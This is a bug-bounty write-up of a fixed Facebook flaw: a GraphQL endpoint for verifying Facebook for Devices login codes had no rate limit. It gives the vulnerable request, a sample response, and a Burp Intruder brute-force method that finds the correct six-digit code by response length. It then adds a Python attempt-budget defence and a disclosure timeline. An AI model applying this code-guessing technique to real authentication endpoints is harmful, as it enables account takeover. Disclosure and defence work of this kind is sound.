Wednesday, April 28, 2021

Facebook Bug POC - Missing rate limit on Device Code verification


A GraphQL call was missing rate limit on verifying login codes for devices.

Facebook for Devices - Facebook for Devices helps you use your Facebook account to access apps and services on smart TVs, cameras, printers and other devices. You can use Facebook for Devices to log in, share and more.

The vulnerable call went to -

POST /v3.3/graphql?access_token=my_access_token

doc_id=2400531753344072&variables={"shortCode":"six_digit_code"}

And if it's a valid call, the response would be -

{"data":{"device_request_view":{"device_name":"","device_XYZ":{"user_code":"six_digit_code","scope":"read_stream,publish_stream,user_photos,friends_photos,user_status,user_videos,friends_videos","auth_status":"ok","timestamp_expire":0,"code_type":null,"nonce":""},"application":{"name":"device_name","id":"device_ID","square_logo":{"uri":"https:\/\/scontent.xx.fbcdn.net\XYZ&_nc_oc=XYZ&_nc_ad=z-m&_nc_cid=2034&_nc_ht=scontent.xx&oh=56756b40ed65cc71725fa36aad4860cb&oe=5E491F85"}}}},"extensions":{"is_final":true}}

Rate limit evaluation -

With up to 50 threads in Burp Intruder it is possible to make 1k requests in just 30 seconds. The response is always the same for every request we make and changes only for the correct code. The 4001st payload will show the same response as the 1st request, and if the 4002nd payload hits the right code, it will show a different response length. Look for responses of around 1200 bytes; that one will be the correct pin.
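The control that was missing here is an attempt budget charged to the caller on every verification request, whether or not the code matches. The following is an added example of such a budget for a device-code verification endpoint; it is illustrative code written for this page, not Facebook's implementation, and the policy numbers (10 attempts per 60-second window, a 15-minute lockout, a 10-minute code lifetime), the `DeviceCodeVerifier` class, and the sample code `483921` are all assumptions made for the example. The caller key is the access token, since that is what the vulnerable call was authenticated with.

```python
"""Added example: per-caller attempt budget for device-code verification (not Facebook's code)."""
import time
from dataclasses import dataclass
from typing import Callable, Dict

# Assumed policy values for the example, not any real platform's settings.
MAX_ATTEMPTS_PER_WINDOW = 10   # verification attempts one access token may make per window
WINDOW_SECONDS = 60.0
LOCKOUT_SECONDS = 900.0        # cool-down once the budget is exhausted
CODE_TTL_SECONDS = 600.0       # a user_code stops being redeemable after this long


@dataclass
class PendingDevice:
    user_code: str
    scope: str
    expires_at: float


@dataclass
class CallerState:
    window_start: float
    attempts: int = 0
    locked_until: float = 0.0


class DeviceCodeVerifier:
    def __init__(self, now: Callable[[], float] = time.time) -> None:
        self._now = now                              # injectable clock for testing
        self._pending: Dict[str, PendingDevice] = {}  # codes waiting to be redeemed
        self._callers: Dict[str, CallerState] = {}    # attempt budget per access token

    def register_code(self, user_code: str, scope: str) -> None:
        """Store a code that was handed to a device during the pairing flow."""
        self._pending[user_code] = PendingDevice(user_code, scope, self._now() + CODE_TTL_SECONDS)

    def _consume_attempt(self, caller: str) -> bool:
        """Charge one attempt to the caller. False when over budget or locked out."""
        now = self._now()
        state = self._callers.get(caller)
        if state is None or now - state.window_start >= WINDOW_SECONDS:
            # Start a fresh window but keep any lockout that is still running.
            locked_until = state.locked_until if state else 0.0
            state = CallerState(window_start=now, locked_until=locked_until)
            self._callers[caller] = state
        if now < state.locked_until:
            return False
        state.attempts += 1
        if state.attempts > MAX_ATTEMPTS_PER_WINDOW:
            state.locked_until = now + LOCKOUT_SECONDS
            return False
        return True

    def verify(self, caller: str, short_code: str) -> dict:
        """Verify a submitted code; the budget is charged before the lookup, so misses count."""
        if not self._consume_attempt(caller):
            return {"auth_status": "rate_limited"}
        device = self._pending.get(short_code)
        if device is None or self._now() >= device.expires_at:
            # Unknown and expired codes get the same answer, so only a live, correct code differs.
            self._pending.pop(short_code, None)
            return {"auth_status": "invalid"}
        # Correct code: redeem it exactly once so a replayed request cannot succeed again.
        del self._pending[short_code]
        return {"auth_status": "ok", "user_code": device.user_code, "scope": device.scope}


def demo_burst(attempts: int) -> Dict[str, int]:
    """Replay a burst of constructed wrong guesses from one token at ~30 ms per request."""
    clock = [1_000_000.0]
    verifier = DeviceCodeVerifier(now=lambda: clock[0])
    verifier.register_code("483921", "user_photos")  # constructed sample code
    counts = {"invalid": 0, "rate_limited": 0, "ok": 0}
    for i in range(attempts):
        clock[0] += 0.03
        counts[verifier.verify("token-A", f"{i:06d}")["auth_status"]] += 1
    return counts


if __name__ == "__main__":
    print(demo_burst(1000))  # the budget stops the burst after 10 attempts
```

With the budget in place a 1k-request burst from one token yields 10 `invalid` answers and 990 `rate_limited` ones, so response length no longer tells the caller anything about the remaining guesses. A deployment would also key the budget on source address and on the device's own identifier, since one token is only one of the things an automated client can rotate.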

Timeline -

Reported - Saturday, 16 November 2019 at 10:23
Triaged  - Tuesday, 19 November 2019 at 22:51
Fixed    - Tuesday, 3 December 2019 at 18:12
Rewarded - Wednesday, 4 December 2019 at 07:27